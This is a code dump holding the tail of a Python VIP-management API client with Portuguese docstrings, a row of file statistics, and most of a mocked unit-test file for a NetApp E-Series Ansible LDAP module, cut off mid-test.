:raise XMLError: Failed to generate the XML response.
"""
url = 'vip/ipv6/all/'
vip_map = dict()
vip_map['ipv6'] = ipv6
vip_map['all_prop'] = all_prop
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def criar(self, id_vip):
"""Executa o script 'gerador_vips' com a opção --cria.
O script somente será executado se a requisição de VIP estiver
validada e ainda não foi criada.
Após executar o script, o campo 'vip_criado' recebe o valor '1'.
:param id_vip: Identificador da requisição de VIP.
:return: Dicionário com a seguinte estrutura:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: Requisição de VIP não cadastrada.
:raise VipError: Se o VIP não está validado ou já está criado.
:raise InvalidParameterError: O identificador da requisição de VIP é inválido ou nulo.
:raise ScriptError: Falha ao executar o script.
:raise DataBaseError: Falha na networkapi ao acessar o banco de dados.
:raise XMLError: Falha na networkapi ao gerar o XML de resposta.
"""
url = 'vip/create/'
vip_map = dict()
vip_map['id_vip'] = id_vip
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def remove_script(self, id_vip):
"""Executa o script 'gerador_vips' com a opção --remove.
O script somente será executado se a requisição de VIP estiver
validada e criada.
Após executar o script, o campo 'vip_criado' recebe o valor '0'.
:param id_vip: Identificador da requisição de VIP.
:return: Dicionário com a seguinte estrutura:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: Requisição de VIP não cadastrada.
:raise VipError: Se o VIP não está validado ou não está criado.
:raise InvalidParameterError: O identificador da requisição de VIP é inválido ou nulo.
:raise ScriptError: Falha ao executar o script.
:raise DataBaseError: Falha na networkapi ao acessar o banco de dados.
:raise XMLError: Falha na networkapi ao gerar o XML de resposta.
"""
url = 'vip/remove/'
vip_map = dict()
vip_map['id_vip'] = id_vip
code, xml = self.submit({'vip': vip_map}, 'POST', url)
return self.response(code, xml)
def alter_maxcon(self, id_vip, maxcon):
"""Change connections limit a VIP from by the identifier.
:param id_vip: Identifier of the request for VIP.
:param maxcon: connections limit.
:return: Dictionary with the following structure:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: Request VIP not registered.
:raise InvalidParameterError: Identifier of the request is invalid or null VIP.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
:raise EnvironmentVipError: The combination of finality, client and environment is invalid.
:raise InvalidTimeoutValueError: The value of timeout is invalid.
:raise InvalidBalMethodValueError: The value of method_bal is invalid.
:raise InvalidCacheValueError: The value of cache is invalid.
:raise InvalidPersistenceValueError: The value of persistence is invalid.
:raise InvalidPriorityValueError: One of the priority values is invalid.
:raise EquipamentoNaoExisteError: The equipment associated with this Vip Request doesn't exist.
:raise IpEquipmentError: Association between equipment and ip of this Vip Request doesn't exist.
:raise IpError: IP not registered.
:raise RealServerPriorityError: Vip Request priority list has an error.
:raise RealServerWeightError: Vip Request weight list has an error.
:raise RealServerPortError: Vip Request port list has an error.
:raise RealParameterValueError: Vip Request real server parameter list has an error.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
if not is_valid_int_param(maxcon):
raise InvalidParameterError(
u'The maxcon is invalid or was not informed.')
url = 'vip/' + str(id_vip) + '/maxcon/' + str(maxcon) + '/'
code, xml = self.submit(None, 'PUT', url)
return self.response(code, xml)
def alter_healthcheck(
self,
id_vip,
healthcheck_type,
healthcheck=None,
id_healthcheck_expect=None):
"""Change VIP's healthcheck config by the identifier.
:param id_vip: Identifier of the request VIP.
:param healthcheck_type: healthcheck_type.
:param healthcheck: The URL to be checked. (Only if healthcheck_type is HTTP)
:param id_healthcheck_expect: Identifier of the expected result. (Only if healthcheck_type is HTTP)
:return: Dictionary with the following structure:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: Request VIP not registered.
:raise InvalidParameterError: Identifier of the request is invalid or null VIP.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
:raise EnvironmentVipError: The combination of finality, client and environment is invalid.
:raise InvalidTimeoutValueError: The value of timeout is invalid.
:raise InvalidBalMethodValueError: The value of method_bal is invalid.
:raise InvalidCacheValueError: The value of cache is invalid.
:raise InvalidPersistenceValueError: The value of persistence is invalid.
:raise InvalidPriorityValueError: One of the priority values is invalid.
:raise EquipamentoNaoExisteError: The equipment associated with this Vip Request doesn't exist.
:raise IpEquipmentError: Association between equipment and ip of this Vip Request doesn't exist.
:raise IpError: IP not registered.
:raise RealServerPriorityError: Vip Request priority list has an error.
:raise RealServerWeightError: Vip Request weight list has an error.
:raise RealServerPortError: Vip Request port list has an error.
:raise RealParameterValueError: Vip Request real server parameter list has an error.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/' + str(id_vip) + '/healthcheck/'
vip_map = dict()
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def alter_priority(self, id_vip, reals_prioritys):
"""Change list the reals_priority to VIP from by the identifier.
:param id_vip: Identifier of the request for VIP.
:param reals_prioritys: List of reals_priority. Ex: ['1','5','3'].
:return: Dictionary with the following structure:
::
{‘sucesso’: {‘codigo’: < codigo >,
‘descricao’: {'stdout':< stdout >, 'stderr':< stderr >}}}
:raise VipNaoExisteError: Request VIP not registered.
:raise InvalidParameterError: Identifier of the request is invalid or null VIP.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/' + str(id_vip) + '/priority/'
vip_map = dict()
vip_map['reals_prioritys'] = {'reals_priority': reals_prioritys}
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def alter_filter(self, id_vip, filter_l7, rule_id):
"""Alter the L7 filter of a given vip request.
:param id_vip: Identifier of the request for VIP.
:param filter_l7: the filter itself.
:param rule_id: Identifier of a selected rule for the VIP. Is optional.
:return: Dictionary with the following structure:
::
{ 'sucesso': 'sucesso' }
:raise ScriptError: Failed to execute script.
:raise UserNotAuthorizedError: User dont have permition.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
url = 'vip/' + str(id_vip) + '/filter/'
vip_map = dict()
vip_map['l7_filter'] = filter_l7
vip_map['rule_id'] = rule_id
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def valid_real_server(
self,
ip,
name_equipment,
id_environment_vip,
valid=True):
"""Valid Real Server
:param ip: IPv4 or Ipv6. 'xxx.xxx.xxx.xxx or xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx'
:param name_equipment: Equipment Name.
:param id_environment_vip: Identifier of the Environment VIP. Integer value and greater than zero.
:return: Dictionary with the following structure:
::
{'real': { 'ip': {'oct4': < oct4 >, 'oct2': < oct2 >, 'oct3': < oct3 >, 'oct1': '< oct1 >, 'version': < version >, 'networkipv4': < networkipv4 >, 'id': < id >, 'descricao': < descricao >,}
'environmentvip': {'cliente_txt': < cliente_txt >, 'id': < id >, 'finalidade_txt': < finalidade_txt >, 'ambiente_p44_txt': < ambiente_p44_txt >},
'equipment': {'grupos': < grupos >, 'tipo_equipamento': < equipamento >, 'modelo': < modelo >, 'id': < id >, 'nome': < nome >}}
or 'ip': {'block0': < block0 >, 'block1': < block1 >, 'block2: < block2 >, 'block3': < block3 >, 'block4': < block4 >, 'block5': < block5 >, 'block6': < block6 >, 'block7': < block7 >,, 'version': < version >, 'networkipv6': < networkipv6 >, 'id': < id >, 'descricao': < descricao >},
'environmentvip': {'cliente_txt': < cliente_txt >, 'id': < id >, 'finalidade_txt': < finalidade_txt >, 'ambiente_p44_txt': < ambiente_p44_txt >},
'equipment': {'grupos': < grupos >, 'tipo_equipamento': < equipamento >, 'modelo': < modelo >, 'id': < id >, 'nome': < nome > }}
:raise InvalidParameterError: The value of id_environment_vip, ip or equip is invalid.
:raise EnvironmentVipNotFoundError: Environment VIP not registered.
:raise IpNotFoundError: IP not registered or IP is not related equipment and Environment Vip.
:raise EquipamentoNotFoundError: Equipment not registered.
:raise UserNotAuthorizedError: User dont have permition.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
real_map = dict()
real_map['ip'] = ip
real_map['name_equipment'] = name_equipment
real_map['id_environment_vip'] = id_environment_vip
real_map['valid'] = valid
url = "vip/real/valid/"
code, xml = self.submit({'real': real_map}, 'POST', url)
return self.response(code, xml)
def get_l7_data(self, id_vip):
""" Get values of applied l7 filter, to-do filters,
rollback filter and date of apply.
:param id_vip: vip request id
:return: Dictionary with the following structure:
::
{'vip' : {'applied_l7_datetime': < applied_l7_datetime >, 'filter_rollback': < filter_rollback >, 'l7_filter': < l7_filter >, 'filter_applied': < filter_applied >, 'filter_valid': < filter_valid > }}
:raise UserNotAuthorizedError: User dont have permition.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/l7/' + str(id_vip) + '/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def validate_l7(self, id_vip):
""" Validates the new filter.
:param id_vip: Vip request id
:return: Dictionary with the following structure:
::
{'sucesso': 'sucesso'}
:raise UserNotAuthorizedError: User dont have permition.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/l7/' + str(id_vip) + '/validate/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def apply_l7(self, id_vip):
""" Applies the new filter.
:param id_vip: Vip request id
:return: Dictionary with the following structure:
::
{'sucesso': { 'codigo': < code >, 'descricao': {'stderr': < terminal output >, 'stdout': < code > }}}
:raise UserNotAuthorizedError: User dont have permition.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/l7/' + str(id_vip) + '/apply/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def rollback_l7(self, id_vip):
""" Applies the last functional filter.
:param id_vip: Vip request id
:return: Dictionary with the following structure:
::
{'sucesso': { 'codigo': < code >, 'descricao': {'stderr': < terminal output >, 'stdout': < code > }}}
:raise UserNotAuthorizedError: User dont have permition.
:raise ScriptError: Failed to execute script.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
url = 'vip/l7/' + str(id_vip) + '/rollback/'
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
def add_block(self, id_vip, id_block, override):
""" Add block in vip rule
:param id_vip: Vip request id
:param id_block: Block id
:param override: 0 or 1 (1 if override filter to apply, 0 if only create new rule with the new block)
:return: Dictionary with the following structure:
::
{'sucesso': {'codigo': < code >, 'descricao': < descricao >}}
:raise VipRequestBlockAlreadyInRule: Block is already in rule.
:raise VipRequestNoBlockInRule: Rule don't have any block associated.
:raise InvalidParameterError: Invalid param
:raise UserNotAuthorizedError: User dont have permition.
:raise VipNaoExisteError: No request for registered VIP.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
url = 'vip/add_block/' + \
str(id_vip) + '/' + str(id_block) + '/' + str(override)
code, xml = self.submit(None, 'GET', url)
return self.response(code, xml)
| 39.449445 | 296 | 0.616578 | 7,477 | 63,987 | 5.139762 | 0.063796 | 0.035285 | 0.025761 | 0.023471 | 0.870492 | 0.861254 | 0.845772 | 0.835259 | 0.823627 | 0.811788 | 0 | 0.010852 | 0.284245 | 63,987 | 1,621 | 297 | 39.473782 | 0.827988 | 0.575711 | 0 | 0.802792 | 0 | 0 | 0.150657 | 0.005929 | 0 | 0 | 0 | 0.004318 | 0 | 1 | 0.062827 | false | 0.00349 | 0.008726 | 0 | 0.13438 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
69bf26742a619b2e16b0d55ba28108548297e4ea | 27,577 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/netapp_eseries/santricity/tests/unit/modules/test_na_santricity_ldap.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/netapp_eseries/santricity/tests/unit/modules/test_na_santricity_ldap.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/netapp_eseries/santricity/tests/unit/modules/test_na_santricity_ldap.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # (c) 2020, NetApp, Inc
# BSD-3 Clause (see COPYING or https://opensource.org/licenses/BSD-3-Clause)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible_collections.netapp_eseries.santricity.plugins.modules.na_santricity_ldap import NetAppESeriesLdap
from units.modules.utils import ModuleTestCase, set_module_args, AnsibleFailJson, AnsibleExitJson
from units.compat import mock
class LdapTest(ModuleTestCase):
REQUIRED_PARAMS = {
"api_username": "admin",
"api_password": "password",
"api_url": "http://localhost",
"ssid": "1"}
REQ_FUNC = "ansible_collections.netapp_eseries.santricity.plugins.modules.na_santricity_ldap.NetAppESeriesLdap.request"
BASE_REQ_FUNC = "ansible_collections.netapp_eseries.santricity.plugins.module_utils.santricity.request"
GET_DOMAINS = {"version": "3",
"ldapDomains": [{"id": "test1",
"bindLookupUser": {"password": "***", "user": "CN=cn,OU=accounts,DC=test1,DC=example,DC=com"},
"groupAttributes": ["memberOf"],
"ldapUrl": "ldap://test.example.com:389",
"names": ["test.example.com"],
"roleMapCollection": [{"groupRegex": ".*", "ignoreCase": False, "name": "storage.monitor"}],
"searchBase": "OU=accounts,DC=test,DC=example,DC=com",
"userAttribute": "sAMAccountName"},
{"id": "test2",
"bindLookupUser": {"password": "***", "user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com"},
"groupAttributes": ["memberOf"],
"ldapUrl": "ldap://test2.example.com:389",
"names": ["test2.example.com"],
"roleMapCollection": [{"groupRegex": ".*", "ignoreCase": False, "name": "storage.admin"},
{"groupRegex": ".*", "ignoreCase": False, "name": "support.admin"},
{"groupRegex": ".*", "ignoreCase": False, "name": "security.admin"},
{"groupRegex": ".*", "ignoreCase": False, "name": "storage.monitor"}],
"searchBase": "OU=accounts,DC=test2,DC=example,DC=com",
"userAttribute": "sAMAccountName"}]}
def _set_args(self, args=None):
module_args = self.REQUIRED_PARAMS.copy()
if args is not None:
module_args.update(args)
set_module_args(module_args)
def test_valid_options_pass(self):
"""Verify valid options."""
options_list = [{"state": "disabled"},
{"state": "absent", "identifier": "test_domain"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}]
for options in options_list:
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args(options)
ldap = NetAppESeriesLdap()
for options in options_list:
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": False})]):
self._set_args(options)
ldap = NetAppESeriesLdap()
def test_get_domain_pass(self):
"""Verify get_domain returns expected data structure."""
options = {"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
with mock.patch(self.REQ_FUNC, return_value=(200, self.GET_DOMAINS)):
self._set_args(options)
ldap = NetAppESeriesLdap()
self.assertEquals(ldap.get_domains(), self.GET_DOMAINS["ldapDomains"])
def test_get_domain_fail(self):
"""Verify get_domain throws expected exceptions."""
options = {"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
with mock.patch(self.REQ_FUNC, return_value=Exception()):
with self.assertRaisesRegexp(AnsibleFailJson, "Failed to retrieve current LDAP configuration."):
self._set_args(options)
ldap = NetAppESeriesLdap()
ldap.get_domains()
def test_build_request_body_pass(self):
"""Verify build_request_body builds expected data structure."""
options_list = [{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}]
expectation_list = [{'id': 'test_domain', 'groupAttributes': ['memberOf'], 'ldapUrl': 'ldap://test.example.com:389', 'names': ['test.example.com'],
'roleMapCollection': [], 'searchBase': 'ou=accounts,DC=test,DC=example,DC=com', 'userAttribute': 'sAMAccountName'},
{'id': 'test_domain', 'groupAttributes': ['memberOf'], 'ldapUrl': 'ldap://test.example.com:389', 'names': ['test.example.com'],
'roleMapCollection': [], 'searchBase': 'ou=accounts,DC=test,DC=example,DC=com', 'userAttribute': 'sAMAccountName',
'bindLookupUser': {'password': 'adminpass', 'user': 'admin'}},
{'id': 'test_domain', 'groupAttributes': ['group_attr1', 'group_attr1'], 'ldapUrl': 'ldap://test.example.com:389',
'names': ['name1', 'name2'], 'roleMapCollection': [], 'searchBase': 'ou=accounts,DC=test,DC=example,DC=com',
'userAttribute': 'user_attr', 'bindLookupUser': {'password': 'adminpass', 'user': 'admin'}}]
for index in range(len(options_list)):
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args(options_list[index])
ldap = NetAppESeriesLdap()
ldap.build_request_body()
self.assertEquals(ldap.body, expectation_list[index])
def test_are_changes_required_pass(self):
"""Verify build_request_body builds expected data structure."""
options_list = [{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass"},
{"state": "present", "identifier": "test_domain", "server_url": "ldap://test.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com", "bind_user": "admin", "bind_password": "adminpass",
"names": ["name1", "name2"], "group_attributes": ["group_attr1", "group_attr1"], "user_attribute": "user_attr"}]
for index in range(len(options_list)):
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args(options_list[index])
ldap = NetAppESeriesLdap()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
self.assertTrue(ldap.are_changes_required())
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "disabled"})
ldap = NetAppESeriesLdap()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
self.assertTrue(ldap.are_changes_required())
self.assertEquals(ldap.existing_domain_ids, ["test1", "test2"])
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "absent", "identifier": "test_domain"})
ldap = NetAppESeriesLdap()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
self.assertFalse(ldap.are_changes_required())
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test2,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
ldap.add_domain = lambda temporary, skip_test: {"id": "ANSIBLE_TMP_DOMAIN"}
with mock.patch(self.REQ_FUNC, return_value=(200, [{"id": "test2", "result": {"authenticationTestResult": "ok"}},
{"id": "ANSIBLE_TMP_DOMAIN", "result": {"authenticationTestResult": "ok"}}])):
self.assertFalse(ldap.are_changes_required())
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
ldap.add_domain = lambda temporary, skip_test: {"id": "ANSIBLE_TMP_DOMAIN"}
with mock.patch(self.REQ_FUNC, return_value=(200, [{"id": "test2", "result": {"authenticationTestResult": "fail"}},
{"id": "ANSIBLE_TMP_DOMAIN", "result": {"authenticationTestResult": "ok"}}])):
self.assertTrue(ldap.are_changes_required())
def test_are_changes_required_fail(self):
"""Verify are_changes_required throws expected exception."""
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test2,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
ldap.add_domain = lambda temporary, skip_test: {"id": "ANSIBLE_TMP_DOMAIN"}
with self.assertRaisesRegexp(AnsibleFailJson, "Failed to authenticate bind credentials!"):
with mock.patch(self.REQ_FUNC, return_value=(200, [{"id": "test2", "result": {"authenticationTestResult": "fail"}},
{"id": "ANSIBLE_TMP_DOMAIN", "result": {"authenticationTestResult": "fail"}}])):
ldap.are_changes_required()
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test2,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.get_domains = lambda: self.GET_DOMAINS["ldapDomains"]
ldap.add_domain = lambda temporary, skip_test: {"id": "ANSIBLE_TMP_DOMAIN"}
with self.assertRaisesRegexp(AnsibleFailJson, "Failed to authenticate bind credentials!"):
with mock.patch(self.REQ_FUNC, return_value=(200, [{"id": "test2", "result": {"authenticationTestResult": "ok"}},
{"id": "ANSIBLE_TMP_DOMAIN", "result": {"authenticationTestResult": "fail"}}])):
ldap.are_changes_required()
def test_add_domain_pass(self):
"""Verify add_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body()
with mock.patch(self.REQ_FUNC, return_value=(200, {"ldapDomains": [{"id": "test2"}]})):
self.assertEquals(ldap.add_domain(), {"id": "test2"})
def test_add_domain_fail(self):
"""Verify add_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body()
with self.assertRaisesRegexp(AnsibleFailJson, "Failed to create LDAP domain."):
with mock.patch(self.REQ_FUNC, return_value=Exception()):
ldap.add_domain()
def test_update_domain_pass(self):
"""Verify update_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.domain = {"id": "test2"}
with mock.patch(self.REQ_FUNC, return_value=(200, None)):
ldap.update_domain()
def test_update_domain_fail(self):
"""Verify update_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
"names": ["test2.example.com"], "group_attributes": ["memberOf"], "user_attribute": "sAMAccountName"})
with mock.patch(self.BASE_REQ_FUNC, side_effect=[(200, {"version": "04.10.0000.0001"}), (200, {"runningAsProxy": True})]):
ldap = NetAppESeriesLdap()
ldap.build_request_body()
ldap.domain = {"id": "test2"}
with self.assertRaisesRegexp(AnsibleFailJson, "Failed to update LDAP domain."):
with mock.patch(self.REQ_FUNC, return_value=Exception()):
ldap.update_domain()
def test_delete_domain_pass(self):
"""Verify delete_domain returns expected data."""
self._set_args({"state": "present", "identifier": "test2", "server_url": "ldap://test2.example.com:389",
"search_base": "ou=accounts,DC=test,DC=example,DC=com",
"bind_user": "CN=cn,OU=accounts,DC=test2,DC=example,DC=com", "bind_password": "adminpass",
"role_mappings": {".*": ["storage.admin", "support.admin", "security.admin", "storage.monitor"]},
